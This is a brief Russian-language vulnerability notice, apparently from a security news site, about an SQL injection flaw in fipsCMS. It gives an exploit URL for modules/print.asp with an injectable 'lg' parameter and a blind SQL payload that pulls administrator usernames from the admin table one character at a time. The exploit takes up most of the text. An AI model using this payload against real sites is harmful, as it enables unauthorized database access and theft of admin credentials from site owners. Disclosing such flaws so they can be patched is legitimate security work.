Программа: fipsCMS

Удаленный нападающий может выполнить произвольные SQL-запросы в базе данных приложения.

Эксплоит:

http://localhost/fipsCMS/modules/print.asp?lg=[SQL]

//IIF((select%20mid(last(username),1,1)%20 from%20(select%20top%2010%20 username%20from%20admin))='a',0,'ko')

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии